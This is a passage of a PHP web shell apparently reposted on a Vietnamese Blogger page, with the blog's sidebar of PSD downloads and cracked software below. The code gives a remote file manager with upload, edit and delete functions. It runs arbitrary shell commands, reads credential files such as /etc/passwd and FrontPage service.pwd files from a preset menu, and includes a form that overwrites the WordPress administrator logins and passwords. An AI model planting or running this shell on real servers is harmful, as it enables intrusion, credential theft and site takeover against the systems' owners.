<div align="center"><font size="4" color="#008000">Path :  </font><input name="incl" type="text" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FF0033; background-color:#000000" value="'.$msr.'" align="LEFT" size="103" /> <br></form>
<form action="" method="POST"><div align="center"><input name="incle" type="hidden" value="'.$msr.'" align="LEFT" size="45" /><textarea name="kr" style="border:1px dotted #CCFF00; width: 700px; height: 450px; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" >'.htmlspecialchars($data).'</textarea><br><input type="submit" value="Save">';
exit;
}
if($_POST[kr]){
$fl = str_replace("\'","'",$_POST[kr]);
$fl = str_replace('\"','"',$fl);
$fl = str_replace('\\\\','\\',$fl);
$d = @fopen($_POST[incle], 'w'); 
@fwrite($d,$fl);
@fclose($d);
if($d){
print'<font size="4" color="#008000">Saved !!</font><br>';
exit;}else{print'<font size="4" color="#008000">Cann\'t Save !!</font><br>';
exit;}}
print'<div align="center">
<form action="" method="POST">
<input name="incl" type="submit" value="'.$_GET['file'].'" align="LEFT" size="45" style="border:1px dotted #0080ff; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#80a0a0"/> <br>

';
exit;

break;

case 'wpps':

if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"wp-\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"wp-\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><br>
  <br>
Set A New username 4 Login : <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
Set A New password 4 Login : <INPUT name=\"pwd\" size=\"15\" value=\"123456\"><br>

<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd   = $_POST['pwd'];
$admin = $_POST['admin'];


 @mysql_connect($localhost,$username,$password) or die(mysql_error());
 @mysql_select_db($database) or die(mysql_error());

$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());


if($a4s){
echo "<b> Success :Now Use A New User And Pass To login In The Admin Panel</b> ";
}

}
break;
}
}
else //Default page that will be shown when the page isn't found or no page is selected.
{

$files = array();
$directories = array();

if(isset($_FILES['uploadedfile']['name']))
{
$target_path = realpath('.').'/';
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);

if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
print "File:".  basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "File upload failed!";
}
}
print "<table border=0 width=100%><td width=15% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
if ($handle = opendir('.'))
{
while (false !== ($file = readdir($handle)))
{
  if(is_dir($file))
  {
$directories[] = $file;
  }
  else
  {
$files[] = $file;
  }
}
asort($directories);
asort($files);
foreach($directories as $file)
{
print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\"><font color='#ff40ff' size='2'>[Renm]</font></a>
<a href=\"?p=delete&file=".realpath($file)."\">[Del]</font></a>
<a href=\"?fdownload=".realpath($file)."\"><font size='2'><font color='#ffc080' size='2'>[Dwnld]</font></a>
</td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";

}


foreach($files as $file)
{
print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\"><font color='#ff40ff' size='2'>[Renm]</font></a>
<a href=\"?p=delete&file=".realpath($file)."\">[Del]</font></a>
<a href=\"?fdownload=".realpath($file)."\"><font color='#ffc080' size='2'>[Dwnld]</font></a>
</td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";

  
}
}
else
{
print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
}


print "</table><hr><table  border=0 width=100%><td><b>~[ Upload File  ]~</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type='hidden' name='MAX_FILE_SIZE' value='100000000' style='color: #ffffff; font-size:8pt; border: 1px dotted #ffffff; background-color: #000000' /><input size=30 style='color: #ffffff; font-size:8pt; border: 1px dotted #ffffff; background-color: #000000' name='uploadedfile' type='file'><input type='submit' value='Upload File !' name='uploadedfile' style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\">
</form></td><td><form action=\"".$me."\" method=GET><b>~[ Go Dir ]~<br></b><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=dir value=\"".realpath('.')."\"><input style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=submit value=\"  Go Dir\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>~[ Create File, Read File ]~<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create File\" style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"></form>
</td><td><form action=\"".$me."\" method=GET><b>~[ Make Dir ]~<br></b><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"  type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Make Dir \" style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"></form></td>
</table>";
echo "<table border='2'>";
print_r('
<form method="POST" action="">
<b>Command :</font></b><input size=40 name="comx1" type="text" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000"><input value="Enter" type="submit" style="border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
</form>
<form method="POST" action="">
<select size="1" size=60 name="comxx" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">رؤية البورتات المفتوحه بالسيرفر</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
<option value="ls -lia">ls -lia</option>
<option value="cat /home/*/public_html/_vti_pvt/access.cnf">cat /home/*/public_html/_vti_pvt/access.cnf</option>
<option value="cat /home/*/public_html/_vti_pvt/service.pwd">cat /home/*/public_html/_vti_pvt/service.pwd</option>
<option value="cat /usr/local/apache/conf/httpd.conf">cat /usr/local/apache/conf/httpd.conf</option>
</select> <input type="submit" value="Enter" style="border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
</form>
</pre>
');
$comn1=shell_exec($_POST[comx1]); 
$comn2=shell_exec($_POST[comxx]); 

if($comn2 != "") echo "<textarea cols='125' rows='29' style='border:1px dotted #CCFF00;  color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>$comn2</textarea>";

if($comn1 != "") echo "<textarea cols='125' rows='29' style='border:1px dotted #CCFF00;  color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>$comn1</textarea>";

echo "</textarea>";
echo '</h4></pre></center></table></td>';
}
function reload()
{
header("Location: ".basename(__FILE__));
}
function get_execution_method()
{
if(function_exists('passthru')){ $m = "passthru"; }
if(function_exists('exec')){ $m = "exec"; }
if(function_exists('shell_exec')){ $m = "shell_ exec"; }
if(function_exists('system')){ $m = "system"; }
if(!isset($m)) //No method found :-|
{
$m = "Disabled";
}
return($m);
}

function execute_command($method,$command)
{
if($method == "passthru")
{
passthru($command);
}

elseif($method == "exec")
{
exec($command,$result);
foreach($result as $output)
{
print $output."<br>";
}
}

elseif($method == "shell_exec")
{
print shell_exec($command);
}

elseif($method == "system")
{
system($command);
}

}

function perm($file)
{
if(file_exists($file))
{
return substr(sprintf('%o', fileperms($file)), -4);
}
else
{
return "????";
}
}

function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}



}

function show_dirs($where)
{
if(ereg("^c:",realpath($where)))
{
$dirparts = explode('\\',realpath($where));
}
else
{
$dirparts = explode('/',realpath($where));
}



$i = 0;
$total = "";

foreach($dirparts as $part)
{
$p = 0;
$pre = "";
while($p != $i)
{
$pre .= $dirparts[$p]."/";
$p++;

}
$total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
$i++;
}

return "<h2>".$total."</h2><br>";

}
print $footer;
exit();
?>





<script language="JavaScript">
<!--
var x = 0
var speed = 300
var text = "[~ BO3LA HaCkEr - Ml7S-HaCkErS ~]"

function Blinky() {
window.status = text
setTimeout("Blinky2()", speed)
}

function Blinky2() {
window.status = " "
setTimeout("Blinky()", speed)
}
Blinky()
</script>

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • [PSD] Hacker - Đặng Khắc ĐứcPSD
    Demo Click here Download Click here
  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • PSD - Người & Ta
    DOWNLOAD PSD
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • Cảnh báo về lỗ hổng bảo mật XSS chưa được vá trong WordPress
    Theo nguồn tin cảnh báo từ group HVA thì WordPress đang dính lỗ hổng bảo mật  Stored XSS cực kỳ nghiêm trọng tại phần bình luận và bài viế...
  • [PSD] Bad Boy
     
  • [PSD] Share Ảnh Bìa Tâm Trạng - Zoy Thủ Thuật #Zoy
    - Con người sinh ra không phải để tan biến đi như một hạt cát vô danh.! Demo Click here Download Click here loading...
  • Tạo Chữ Phong Cách
  • Bandicam Full Crack - Duy Ripper
     
  • [PSD] Share Ảnh Bìa Nụ Cười Tỏa Nắng - Zoy Thủ Thuật #Zoy
    Demo Click here Download Click here Theo Dõi Mình Để Xem Thêm Những Ảnh Đẹp Mới Nhất Nhé... Link Facebook :  https://www.faceboo...

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • [PSD] Hacker - Đặng Khắc ĐứcPSD
    [PSD] Hacker - Đặng Khắc ĐứcPSD
    Demo Click here Download Click here
  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • PSD - Người & Ta
    PSD - Người & Ta
    DOWNLOAD PSD
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • Cảnh báo về lỗ hổng bảo mật XSS chưa được vá trong WordPress
    Cảnh báo về lỗ hổng bảo mật XSS chưa được vá trong WordPress
    Theo nguồn tin cảnh báo từ group HVA thì WordPress đang dính lỗ hổng bảo mật  Stored XSS cực kỳ nghiêm trọng tại phần bình luận và bài viế...
  • [PSD] Bad Boy
    [PSD] Bad Boy
     
  • [PSD] Share Ảnh Bìa Tâm Trạng - Zoy Thủ Thuật #Zoy
    [PSD] Share Ảnh Bìa Tâm Trạng - Zoy Thủ Thuật #Zoy
    - Con người sinh ra không phải để tan biến đi như một hạt cát vô danh.! Demo Click here Download Click here loading...
  • Tạo Chữ Phong Cách
    Tạo Chữ Phong Cách
  • Bandicam Full Crack - Duy Ripper
    Bandicam Full Crack - Duy Ripper
     
  • [PSD] Share Ảnh Bìa Nụ Cười Tỏa Nắng - Zoy Thủ Thuật #Zoy
    [PSD] Share Ảnh Bìa Nụ Cười Tỏa Nắng - Zoy Thủ Thuật #Zoy
    Demo Click here Download Click here Theo Dõi Mình Để Xem Thêm Những Ảnh Đẹp Mới Nhất Nhé... Link Facebook :  https://www.faceboo...
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt